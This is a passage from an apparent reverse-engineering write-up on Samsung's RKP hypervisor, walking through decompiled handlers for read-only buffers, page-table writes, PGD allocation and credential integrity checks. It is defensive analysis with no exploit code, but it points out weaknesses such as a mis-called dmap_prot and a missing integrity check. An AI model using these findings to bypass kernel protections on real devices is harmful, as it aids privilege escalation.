int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
  // ...

  page = page_allocator_alloc_page();
  ret_p = regs->x2;
  if ((ret_p & 1) != 0) {
    if (ha1 != 0 || ha2 != 0)
      rkp_policy_violation("Setting ha1 or ha2 should be done once");
    ret_p &= 0xFFFFFFFFFFFFFFFE;
    ha1 = page;
    ha2 = page + 8;
  }
  if (ret_p) {
    if (!page)
      uh_log('L', "rkp.c", 270, "RKP_8f7b0e12");
    *virt_to_phys_el1(ret_p) = page;
  }
  regs->x0 = page;
  return 0;
}

rkp_cmd_rkp_robuffer_alloc simply allocates a page from the page allocator (which uses the "robuf" region that we have seen earlier). The ha1/ha2 stuff is only used by the RKP test module.

int64_t rkp_cmd_rkp_robuffer_free(saved_regs_t* regs) {
  // ...

  if (!regs->x2)
    uh_log('D', "rkp.c", 286, "Robuffer Free wrong address");
  page = rkp_get_pa(regs->x2);
  page_allocator_free_page(page);
  return 0;
}

rkp_cmd_rkp_robuffer_alloc simply frees the page back to the page allocator.

rkp_cmd_set_pages_ro_cred_jar, rkp_cmd_set_pages_ro_tsec_jar and rkp_cmd_set_pages_ro_tsec_jar call rkp_set_pages_ro with a different type.

uint8_t* rkp_set_pages_ro(saved_regs_t* regs, int64_t type) {
  // ...

  if ((regs->x2 & 0xFFF) != 0)
    return uh_log('L', "rkp_kdp.c", 803, "Page not aligned in set_page_ro %lx", regs->x2);
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  if (rkp_s2_page_change_permission(page, 0x80, 0, 0) == -1) {
    uh_log('L', "rkp_kdp.c", 813, "Cred: Unable to set permission %lx %lx %lx", regs->x2, page, 0);
  } else {
    memset(page, 0xFF, 0x1000);
    switch (type) {
      case 0:
        type = CRED;
        break;
      case 1:
        type = SEC_PTR;
        break;
      case 2:
        type = NS;
        break;
    }
    rkp_phys_map_set(page, type);
    return rkp_phys_map_unlock(page);
  }
  return rkp_phys_map_unlock(page);
}

rkp_set_pages_ro does the following:

converts the PA into a VA using rkp_get_pa;
makes the page RO in the stage 2 using rkp_s2_page_change_permission;
zeroes out the page;
marks the page as CRED, SEC_PTR or NS in the physmap.

rkp_cmd_ro_free_pages calls rkp_ro_free_pages.

uint8_t* rkp_ro_free_pages(saved_regs_t* regs) {
  // ...

  if ((regs->x2 & 0xFFF) != 0)
    return uh_log('L', "rkp_kdp.c", 843, "Page not aligned in set_page_ro %lx", regs->x2);
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  if (!is_phys_map_cred(page) && !is_phys_map_ns(page) && !is_phys_map_sec_ptr(page)) {
    uh_log('L', "rkp_kdp.c", 854, "rkp_ro_free_pages : physmap_entry_invalid %lx %lx ", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  if (rkp_s2_page_change_permission(page, 0, 1, 0) < 0) {
    uh_log('L', "rkp_kdp.c", 862, "rkp_ro_free_pages: Unable to set permission %lx %lx %lx", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  memset(page, 0, 0x1000);
  rkp_phys_map_set(page, FREE);
  return rkp_phys_map_unlock(page);
}

rkp_cmd_ro_free_pages does the following:

converts the PA into a VA using rkp_get_pa;
verifies that the page is marked as CRED, SEC_PTR, or NS in the physmap;
makes the page RWX in the stage 2 using rkp_s2_page_change_permission;
zeroes out the page;
marks the page as FREE in the physmap.

int64_t rkp_cmd_assign_cred_size(saved_regs_t* regs) {
  rkp_assign_cred_size(regs);
  return 0;
}

rkp_cmd_assign_cred_size calls rkp_assign_cred_size.

int64_t rkp_assign_cred_size(saved_regs_t* regs) {
  // ...

  cred_jar_size = regs->x2;
  rkp_cred->CRED_BUFF_SIZE = cred_jar_size;
  tsec_jar_size = regs->x3;
  rkp_cred->SP_BUFF_SIZE = tsec_jar_size;
  return uh_log('L', "rkp_kdp.c", 1033, "BUFF SIZE %lx %lx %lx", cred_jar_size, tsec_jar_size, 0);
}

rkp_assign_cred_size does the following;

it saves the size of struct cred in CRED_BUFF_SIZE;
it saves the size of struct task_security_struct in SP_BUFF_SIZE.

int64_t rkp_cmd_assign_ns_size(saved_regs_t* regs) {
  rkp_assign_ns_size(regs);
  return 0;
}

rkp_cmd_assign_ns_size calls rkp_assign_ns_size.

int64_t rkp_assign_ns_size(saved_regs_t* regs) {
  // ...

  if (!rkp_cred)
    return uh_log('W', "rkp_kdp.c", 1041, "RKP_ae6cae81");
  nsparam_user = rkp_get_pa(regs->x2);
  if (!nsparam_user)
    return uh_log('L', "rkp_kdp.c", 1048, "NULL Data: rkp assign_ns_size");
  memcpy(&nsparam, nsparam_user, sizeof(nsparam));
  ns_buff_size = nsparam.ns_buff_size;
  ns_size = nsparam.ns_size;
  rkp_cred->NS_BUFF_SIZE = ns_buff_size;
  rkp_cred->NS_SIZE = ns_size;
  if (nsparam.bp_offset > ns_size)
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  sb_offset = nsparam.sb_offset;
  if (nsparam.sb_offset > ns_size)
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  flag_offset = nsparam.flag_offset;
  if (nsparam.flag_offset > ns_size)
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  data_offset = nsparam.data_offset;
  if (nsparam.data_offset > ns_size)
    return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
  rkp_cred->BPMNT_VFSMNT_OFFSET = nsparam.bp_offset >> 3;
  rkp_cred->SB_VFSMNT_OFFSET = sb_offset >> 3;
  rkp_cred->FLAGS_VFSMNT_OFFSET = flag_offset >> 2;
  rkp_cred->DATA_VFSMNT_OFFSET = data_offset >> 3;
  uh_log('L', "rkp_kdp.c", 1070, "NS Protection Activated  Buff_size = %lx ns size = %lx", ns_buff_size, ns_size);
  return uh_log('L', "rkp_kdp.c", 1071, "NS %lx %lx %lx %lx", rkp_cred->BPMNT_VFSMNT_OFFSET, rkp_cred->SB_VFSMNT_OFFSET,
                rkp_cred->FLAGS_VFSMNT_OFFSET, rkp_cred->DATA_VFSMNT_OFFSET);
}

rkp_assign_ns_size does the following:

it does same basic sanity checks on the offsets of the struct ns_param;
it saves the various offsets into global variables.

rkp_cmd_cred_set_fp calls rkp_cred_set_fp.

int64_t invalid_cred_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  if (!is_phys_map_cred(object_pa) ||
      object_va && object_va == object_va / rkp_cred->CRED_BUFF_SIZE * rkp_cred->CRED_BUFF_SIZE &&
          rkp_cred->CRED_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

int64_t invalid_sec_ptr_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  if (!is_phys_map_sec_ptr(object_pa) || object_va &&
                                             object_va == object_va / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE &&
                                             rkp_cred->SP_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

int64_t invalid_ns_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  if (!is_phys_map_ns(object_pa) || object_va &&
                                        object_va == object_va / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE &&
                                        rkp_cred->NS_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}

void rkp_cred_set_fp(saved_regs_t* regs) {
  // ...

  object_pa = rkp_get_pa(regs->x2);
  offset = regs->x3;
  freelist_ptr = regs->x4;
  rkp_phys_map_lock(object_pa);
  if (!is_phys_map_cred(object_pa) && !is_phys_map_sec_ptr(object_pa) && !is_phys_map_ns(object_pa)) {
    uh_log('L', "rkp_kdp.c", 242, "Neither Cred nor Secptr %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_cred = is_phys_map_cred(object_pa);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
    rkp_phys_map_unlock(object_pa);
  }
  rkp_phys_map_unlock(object_pa);
  if (freelist_ptr) {
    freelist_ptr_pa = rkp_get_pa(freelist_ptr);
    rkp_phys_map_lock(freelist_ptr_pa);
    if (!is_phys_map_cred(freelist_ptr_pa) && !is_phys_map_sec_ptr(freelist_ptr_pa) &&
        !is_phys_map_ns(freelist_ptr_pa)) {
      uh_log('L', "rkp_kdp.c", 259, "Invalid Free Pointer %lx %lx %lx", regs->x2, regs->x3, regs->x4);
      is_cred = is_phys_map_cred(freelist_ptr_pa);
      is_sec_ptr = is_phys_map_sec_ptr(freelist_ptr_pa);
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
      rkp_phys_map_unlock(vafreelist_ptr_par14);
    }
    rkp_phys_map_unlock(freelist_ptr_pa);
  }
  if (invalid_cred_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 267, "Invalid cred pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_sec_ptr_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 272, "Invalid Security pointer_fp 111 %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    uh_log('L', "rkp_kdp.c", 273, "Invalid Security pointer_fp 222 %lx %lx %lx %lx %lx", is_sec_ptr, regs->x2,
           regs->x2 - regs->x2 / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE, offset, rkp_cred->SP_SIZE);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_ns_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 278, "Invalid Namespace pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else {
    *(offset + object_pa) = freelist_ptr;
  }
}

rkp_cred_set_fp does the following:

it checks if the object is marked as CRED, SEC_PTR or NS in the physmap;
- it triggers a violation is it isn't.
it does the exact same check for the freelist pointer;
it checks if the object is aligned on the expected size for its type;
it checks if the freelist pointer offset is equals to the expected value;
- it any of these checks fails, it triggers a violation.
finally it sets the freelist pointer inside the object.

rkp_cmd_prot_dble_map calls rkp_prot_dble_map.

saved_regs_t* rkp_prot_dble_map(saved_regs_t* regs) {
  // ...

  address = regs->x2 & 0xFFFFFFFFF000;
  if (!address)
    return 0;
  val = regs->x4;
  if (val > 1) {
    uh_log('L', "rkp_kdp.c", 1163, "Invalid op val %lx ", val);
    return 0;
  }
  order = regs->x3;
  if (order <= 19) {
    offset = 0;
    size = 0x1000 << order;
    do {
      res = rkp_set_map_bitmap(address + offset, val);
      if (!res) {
        uh_log('L', "rkp_kdp.c", 1169, "Page has no bitmap %lx %lx %lx ", address + offset, val, offset);
      }
      offset += 0x1000;
    } while (offset < size);
  }
}

rkp_prot_dble_map does the following:

call rkp_set_map_bitmap (which uses dbl_bitmap) on each page of the region.

The attentive reader will have noticed that the kernel function dmap_prot doesn't even call rkp_prot_dble_map properly: it doesn't give it its addr argument, so the arguments are all messed up.

Modifying Page Tables

What happens if the kernel needs to modify its pages tables entries? On the kernel side, this happens for each level in set_pud, set_pmd and set_pte of arch/arm64/include/asm/pgtable.h.

static inline void set_pud(pud_t *pudp, pud_t pud)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pudp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT1, (u64)pudp, pud_val(pud), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pudp), "r" (pud)
        : "x1", "x2", "memory");
    }
#else
    *pudp = pud;
#endif
    dsb(ishst);
    isb();
}

static inline void set_pmd(pmd_t *pmdp, pmd_t pmd)
{
#ifdef CONFIG_UH_RKP
    if (rkp_is_pg_protected((u64)pmdp)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT2, (u64)pmdp, pmd_val(pmd), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (pmdp), "r" (pmd)
        : "x1", "x2", "memory");
    }
#else
    *pmdp = pmd;
#endif
    dsb(ishst);
    isb();
}

static inline void set_pte(pte_t *ptep, pte_t pte)
{
#ifdef CONFIG_UH_RKP
    /* bug on double mapping */
    BUG_ON(pte_val(pte) && rkp_is_pg_dbl_mapped(pte_val(pte)));

    if (rkp_is_pg_protected((u64)ptep)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
    } else {
        asm volatile("mov x1, %0\n"
                    "mov x2, %1\n"
                    "str x2, [x1]\n"
        :
        : "r" (ptep), "r" (pte)
        : "x1", "x2", "memory");
    }
#else
    *ptep = pte;
#endif
    /*
     * Only if the new pte is valid and kernel, otherwise TLB maintenance
     * or update_mmu_cache() have the necessary barriers.
     */
    if (pte_valid_not_user(pte)) {
        dsb(ishst);
        isb();
    }
}

These functions have been modified. For all 3 levels, they check if the entry they are trying to write to has been set as read-only by RKP (using ro_bitmap that we saw earlier), and if that is the case, they will call the hypervisor using the uh_call function. The commands used for each level are (respectively):

RKP_WRITE_PGT1
RKP_WRITE_PGT2
RKP_WRITE_PGT3

It can also be noted that set_pte will in addition check if the (intermeditate) physical address is already mapped using dbl_bitmap to prevent double mapping (mapping of the same PA to two or more VAs).

On the hypervisor side, rkp_cmd_write_pgtx simply calls rkp_lxpgt_write after incrementing a counter.

First Level

uint8_t* rkp_l1pgt_write(uint64_t pudp, int64_t pud_new) {
  // ...

  pudp_pa = rkp_get_pa(pudp);
  pud_old = *pudp_pa;
  rkp_phys_map_lock(pudp_pa);
  if (!is_phys_map_l1(pudp_pa)) {
    if (!rkp_deferred_inited) {
      set_entry_of_pgt((int64_t*)pudp_pa, pud_new);
      return rkp_phys_map_unlock(pudp_pa);
    }
    rkp_policy_violation("L1 write wrong page, %lx, %lx", pudp_pa, pud_new);
  }
  is_kernel = is_phys_map_kernel(pudp_pa);
  if (pud_old) {
    if ((pud_old & 3) != 3)
      rkp_policy_violation("l1_pgt write cannot handle blocks - for old entry, %lx", pudp_pa);
    res = rkp_l2pgt_process_table(pud_old & 0xFFFFFFFFF000, (pudp_pa << 27) & 0x7FC0000000, 0);
  }
  start_addr = 0xFFFFFF8000000000;
  if (!is_kernel)
    start_addr = 0;
  if (pud_new) {
    addr = start_addr | (pudp_pa << 27) & 0x7FC0000000;
    if ((pud_new & 3) != 3)
      rkp_policy_violation("l1_pgt write cannot handle blocks - for new entry, %lx", pud_new);
    res = rkp_l2pgt_process_table(pud_new & 0xFFFFFFFFF000, addr, 1);
    if (!is_kernel)
      set_pxn_bit_of_desc(&pud_new, 1);
    if ((pud_new & 3) != 0 && (pud_new & 0xFFFFFFFFF000) == 0)
      uh_log('L', "rkp_l1pgt.c", 309, "l1 write zero");
  }
  if (res) {
    uh_log('L', "rkp_l1pgt.c", 316, "L1 write failed, %lx, %lx", pudp_pa, pud_new);
    return rkp_phys_map_unlock(pudp_pa);
  }
  set_entry_of_pgt(pudp_pa, pud_new);
  return rkp_phys_map_unlock(pudp_pa);
}

rkp_l1pgt_write does the following:

it checks that the entry indeed belongs to a L1 table in the physmap;
- if it doesn't and we are defer inited, it triggers a violation;
- it it doesn't and we are not defer inited, it makes the modification and returns.
if the old entry was not an invalid descriptor;
- if the old entry was a block descriptor, it triggers a violation;
- otherwise, it calls rkp_l2pgt_process_table on the old L2 table;
  - the call is made with is_alloc = 0 to indicate a removal.
if the new entry is not an invalid descriptor;
- if the new entry is a block descriptor, it triggers a violation;
- otherwise, it calls rkp_l2pgt_process_table on the new L2 table;
- if the new descriptor maps user space, it sets its PXN bit.
finally, it makes the modification and returns.

Second Level

uint8_t* rkp_l2pgt_write(int64_t pmdp, int64_t pmd_new) {
  // ...

  pmdp_pa = rkp_get_pa(pmdp);
  pmd_old = *pmdp_pa;
  rkp_phys_map_lock(pmdp_pa);
  if (!is_phys_map_l2(pmdp_pa)) {
    if (rkp_deferred_inited) {
      uh_log('D', "rkp_l2pgt.c", 236, "l2 is not marked as L2 Type in Physmap, trying to fix it, %lx", pmdp_pa);
    } else {
      set_entry_of_pgt(pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  is_flag3 = is_phys_map_flag3(pmdp_pa);
  is_kernel = is_phys_map_kernel(pmdp_pa);
  start_addr = 0xFFFFFF8000000000;
  if (!is_kernel)
    start_addr = 0;
  addr = (pmdp_pa << 18) & 0x3FE00000 | ((is_flag3 & 0x1FF) << 30) | start_addr;
  if (pmd_old) {
    res = check_single_l2e(pmdp_pa, addr, 0);
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 254, "Failed in freeing entries under the l2e %lx %lx", pmdp_pa, pmd_new);
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
  }
  if (pmd_new) {
    res = check_single_l2e(&pmd_new, addr, 1);
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
      return rkp_phys_map_unlock(pmdp_pa);
    }
    if ((pmd_new & 3) != 0 && (pmd_new & 0xFFFFFFFFF000) == 0)
      uh_log('L', "rkp_l2pgt.c", 269, "l2 write zero, %lx", pmdp_pa);
  }
  set_entry_of_pgt(pmdp_pa, pmd_new);
  return rkp_phys_map_unlock(pmdp_pa);
}

rkp_l2pgt_write does the following:

it checks that the entry indeed belongs to a L2 table in the physmap;
- if it doesn't and we are defer inited, it still continues;
- it it doesn't and we are not defer inited, it makes the modification and return.
if the old entry was not an invalid descriptor;
- it calls check_single_l2e on the old entry;
  - the call is made with is_alloc = 0 to indicate a removal;
  - it the function failed, it returns without making the modification.
if the new entry is not an invalid descriptor;
- it calls rkp_l2pgt_process_table on the new entry;
  - it the function failed, it returns without making the modification.
finally, it makes the modification and returns.

Third Level

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
  // ...

  ptep_pa = rkp_get_pa(ptep);
  rkp_phys_map_lock(ptep_pa);
  if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
    if ((pte_val & 3) != 3 || get_pxn_bit_of_desc(pte_val, 3))
      allowed = 1;
    else
      allowed = rkp_deferred_inited == 0;
  } else {
    allowed = 0;
  }
  rkp_phys_map_unlock(ptep_pa);
  cs_enter(&l3pgt_lock);
  if (stext_ptep && ptep_pa < stext_ptep && (ptep_pa ^ stext_ptep) <= 0xFFF) {
    if (pte_val)
      pte_val |= 0x20000000000000;
    cs_exit(&l3pgt_lock);
    return set_entry_of_pgt(ptep_pa, pte_val);
  }
  cs_exit(&l3pgt_lock);
  if (!allowed) {
    pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
    return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
  }
  return set_entry_of_pgt(ptep_pa, pte_val);
}

rkp_l3pgt_write does the following:

it checks if the entry belongs to a L2 table or is free in the physmap;
- if the new descriptor is invalid;
- or if we are not defer inited;
- or if the PXN bit of the new descriptor is set;
  - then it sets allowed to 1.
in all other cases, allowed will still be 0;
if the entry is in the same table as one of the kernel text;
- if sets the PXN bit of the descriptor;
- it then makes the modification and returns.
if allowed is 1, it makes the modification and returns;
otherwise, it triggers a violation.

Allocating/Freeing PGDs

Another operation that the kernel might need to do is allocate or free a page table directory. On the kernel side, this is done by pgd_alloc and pgd_free of arch/arm64/mm/pgd.c.

pgd_t *pgd_alloc(struct mm_struct *mm)
{
    // ...
    pgd_t *ret = NULL;

    ret = (pgd_t *) rkp_ro_alloc();

    if (!ret) {
        if (PGD_SIZE == PAGE_SIZE)
            ret = (pgd_t *)__get_free_page(PGALLOC_GFP);
        else
            ret = kmem_cache_alloc(pgd_cache, PGALLOC_GFP);
    }

    if(unlikely(!ret)) {
        pr_warn("%s: pgd alloc is failed\n", __func__);
        return ret;
    }

    uh_call(UH_APP_RKP, RKP_NEW_PGD, (u64)ret, 0, 0, 0);

    return ret;
    // ...
}

void pgd_free(struct mm_struct *mm, pgd_t *pgd)
{
    // ...
    uh_call(UH_APP_RKP, RKP_FREE_PGD, (u64)pgd, 0, 0, 0);

    /* if pgd memory come from read only buffer, the put it back */
    /*TODO: use a macro*/
    if (is_rkp_ro_page((u64)pgd))
        rkp_ro_free((void *)pgd);
    else {
        if (PGD_SIZE == PAGE_SIZE)
            free_page((unsigned long)pgd);
        else
            kmem_cache_free(pgd_cache, pgd);
    }
    // ...
}

Once again, these functions have been modified. The first modification is that instead of using pages from the kernel page allocator, they will use read-only pages returned by RKP. These pages are allowed using rkp_ro_alloc and freed using rkp_ro_free.

The second modification is that they will make RKP aware of the newly allocated or freed page table directory by calling uh_call with the command RKP_NEW_PGD and RKP_FREE_PGD respectively.

On the hypervisor sides, rkp_cmd_new_pgd and rkp_cmd_free_pgd call rkp_l1pgt_new_pgd and rkp_l1pgt_free_pgd respectively, after incrementing a counter.

void rkp_l1pgt_new_pgd(saved_regs_t* regs) {
  // ...

  pgdp = rkp_get_pa(regs->x2) & 0xFFFFFFFFFFFFF000;
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || TRAMP_PGD && pgdp == TRAMP_PGD) {
    rkp_policy_violation("PGD new value not allowed, pgdp : %lx", pgdp);
  } else if (rkp_inited) {
    if (rkp_l1pgt_process_table(pgdp, 0, 1) < 0)
      uh_log('L', "rkp_l1pgt.c", 383, "l1pgt processing is failed, pgdp : %lx", pgdp);
  }
}

rkp_l1pgt_new_pgd does the following:

it checks if the PGD is swapper_pg_dir, idmap_pg_dir or tramp_pg_dir;
- it triggers a violation if it is any of them.
otherwise if we are inited, it calls rkp_l1pgt_process_table.

void rkp_l1pgt_free_pgd(saved_regs_t* regs) {
  // ...

  pgd_pa = rkp_get_pa(regs->x2);
  pgdp = pgd_pa & 0xFFFFFFFFFFFFF000;
  if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
    uh_log('E', "rkp_l1pgt.c", 345, "PGD free value not allowed, pgdp=%lx k_pgd=%lx k_id_pgd=%lx", pgdp, INIT_MM_PGD,
           ID_MAP_PGD);
    rkp_policy_violation("PGD free value not allowed, pgdp=%p k_pgd=%p k_id_pgd=%p", pgdp, INIT_MM_PGD, ID_MAP_PGD);
  } else if (rkp_inited) {
    if ((get_ttbr0_el1() & 0xFFFFFFFFFFFF) == (pgd_pa & 0xFFFFFFFFF000) ||
        (get_ttbr1_el1() & 0xFFFFFFFFFFFF) == (pgd_pa & 0xFFFFFFFFF000)) {
      uh_log('E', "rkp_l1pgt.c", 354, "PGD free value not allowed, pgdp=%lx ttbr0_el1=%lx ttbr1_el1=%lx", pgdp,
             get_ttbr0_el1(), get_ttbr1_el1());
    }
    if (rkp_l1pgt_process_table(pgdp, 0, 0) < 0)
      uh_log('L', "rkp_l1pgt.c", 363, "l1pgt processing is failed, pgdp : %lx", pgdp);
  }
}

rkp_l1pgt_free_pgd does the following:

it checks if the PGD is swapper_pg_dir, idmap_pg_dir or tramp_pg_dir;
- it triggers a violation if it is any of them.
it we are not inited, it returns and does nothing;
otherwise, if checks if the PGD is in the same page as TTBR0_EL1 or TTBR1_EL1;
- it logs an error but does still continues.
it calls rkp_l1pgt_process_table to process the removal.

Credentials Protection

Kernel Structures

We have seen that struct cred and struct task_security_struct are now allocated in read-only pages and cannot be modified by the kernel. These structures also get new fields that are going to be used for Data Flow Integrity. Each one gets a "back-pointer", which is a pointer to the owning structure:

struct task_struct for struct cred;
struct cred for struct task_security_struct.

The struct cred also gets a back-pointer to the owning task's PGD, as well as a "use counter" that prevents reusing the struct cred of another struct task_struct (especially init's credentials).

// from include/linux/cred.h
struct cred {
    // ...
    atomic_t *use_cnt;
    struct task_struct *bp_task;
    void *bp_pgd;
    unsigned long long type;
} __randomize_layout;

// from security/selinux/include/objsec.h

struct task_security_struct {
    // ...
    void *bp_cred;
};

These values are supposed to be verified on each SELinux hooks via a call to security_integrity_current, but it looks like this isn't implemented in our research device and they maybe forgot to add it. We will take a source code snippet from another device that has it.

// from security/security.c
#define call_void_hook(FUNC, ...)               \
    do {                            \
        struct security_hook_list *P;           \
                                \
        if(security_integrity_current()) break; \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) \
            P->hook.FUNC(__VA_ARGS__);      \
    } while (0)

#define call_int_hook(FUNC, IRC, ...) ({            \
    int RC = IRC;                       \
    do {                            \
        struct security_hook_list *P;           \
                                \
        RC = security_integrity_current();      \
        if (RC != 0)                            \
            break;                              \
        list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
            RC = P->hook.FUNC(__VA_ARGS__);     \
            if (RC != 0)                \
                break;              \
        }                       \
    } while (0);                        \
    RC;                         \
})

// from security/selinux/hooks.c
static inline unsigned int cmp_sec_integrity(const struct cred *cred,struct mm_struct *mm)
{
    return ((cred->bp_task != current) ||
            (mm && (!( in_interrupt() || in_softirq())) &&
            (cred->bp_pgd != swapper_pg_dir) &&
            (mm->pgd != cred->bp_pgd)));
}
extern struct cred init_cred;
static inline unsigned int rkp_is_valid_cred_sp(u64 cred,u64 sp)
{
        struct task_security_struct *tsec = (struct task_security_struct *)sp;

        if((cred == (u64)&init_cred) &&
            ( sp == (u64)&init_sec)){
            return 0;
        }
        if(!rkp_ro_page(cred)|| !rkp_ro_page(cred+sizeof(struct cred)-1)||
            (!rkp_ro_page(sp)|| !rkp_ro_page(sp+sizeof(struct task_security_struct)-1))) {
            return 1;
        }
        if((u64)tsec->bp_cred != cred) {
            return 1;
        }
        return 0;
}
inline void rkp_print_debug(void)
{
    u64 pgd;
    struct cred *cred;

    pgd = (u64)(current->mm?current->mm->pgd:swapper_pg_dir);
    cred = (struct cred *)current_cred();

    printk(KERN_ERR"\n RKP44 cred = %p bp_task = %p bp_pgd = %p pgd = %llx stat = #%d# task = %p mm = %p \n",cred,cred->bp_task,cred->bp_pgd,pgd,(int)rkp_ro_page((unsigned long long)cred),current,current->mm);

    //printk(KERN_ERR"\n RKP44_1 uid = %d gid = %d euid = %d  egid = %d \n",(u32)cred->uid,(u32)cred->gid,(u32)cred->euid,(u32)cred->egid);
    printk(KERN_ERR"\n RKP44_2 Cred %llx #%d# #%d# Sec ptr %llx #%d# #%d#\n",(u64)cred,rkp_ro_page((u64)cred),rkp_ro_page((u64)cred+sizeof(struct cred)),(u64)cred->security, rkp_ro_page((u64)cred->security),rkp_ro_page((u64)cred->security+sizeof(struct task_security_struct)));


}
/* Main function to verify cred security context of a process */
int security_integrity_current(void)
{
    rcu_read_lock();
    if ( rkp_cred_enable &&
        (rkp_is_valid_cred_sp((u64)current_cred(),(u64)current_cred()->security)||
        cmp_sec_integrity(current_cred(),current->mm)||
        cmp_ns_integrity())) {
        rkp_print_debug();
        rcu_read_unlock();
        panic("RKP CRED PROTECTION VIOLATION\n");
    }
    rcu_read_unlock();
    return 0;
}
unsigned int rkp_get_task_sec_size(void)
{
    return sizeof(struct task_security_struct);
}
unsigned int rkp_get_offset_bp_cred(void)
{
    return offsetof(struct task_security_struct,bp_cred);
}

We can see that security_integrity_current does the following:

it checks that the current cred and task_security_struct are not init's;
it checks that the start/end of the current cred and task_security_struct are in a RO page;
it checks that the back pointer of task_security_struct points to cred;
it checks that the back pointer of cred points to the current task_struct;
it checks that the PGD back pointer of cred isn't swapper_pg_dir;
it checks that the PGD bp of cred is the PDG of the current mm_struct;
it does some checking on the mount namespace that we will see later.

Protection Initialization

As mentionned previously, the kernel will need to call RKP each time it wants to modify the struct cred of process. RKP will do some verifications before executing the kernel demands. And to do these verifications, it needs to know the offsets of various fields of the struct task_struct and struct cred structures.

On the kernel side, the command is sent in kdp_init from init/main.c.

// from init/main.c
void kdp_init(void)
{
    kdp_init_t cred;

    cred.credSize   = sizeof(struct cred);
    cred.sp_size    = rkp_get_task_sec_size();
    cred.pgd_mm     = offsetof(struct mm_struct,pgd);
    cred.uid_cred   = offsetof(struct cred,uid);
    cred.euid_cred  = offsetof(struct cred,euid);
    cred.gid_cred   = offsetof(struct cred,gid);
    cred.egid_cred  = offsetof(struct cred,egid);

    cred.bp_pgd_cred    = offsetof(struct cred,bp_pgd);
    cred.bp_task_cred   = offsetof(struct cred,bp_task);
    cred.type_cred      = offsetof(struct cred,type);
    cred.security_cred  = offsetof(struct cred,security);
    cred.usage_cred     = offsetof(struct cred,use_cnt);

    cred.cred_task      = offsetof(struct task_struct,cred);
    cred.mm_task        = offsetof(struct task_struct,mm);
    cred.pid_task       = offsetof(struct task_struct,pid);
    cred.rp_task        = offsetof(struct task_struct,real_parent);
    cred.comm_task      = offsetof(struct task_struct,comm);

    cred.bp_cred_secptr     = rkp_get_offset_bp_cred();

    cred.verifiedbootstate = (u64)verifiedbootstate;
#ifdef CONFIG_SAMSUNG_PRODUCT_SHIP
    cred.selinux.ss_initialized_va  = (u64)&ss_initialized;
#endif
    uh_call(UH_APP_RKP, RKP_KDP_X40, (u64)&cred, 0, 0, 0);
}

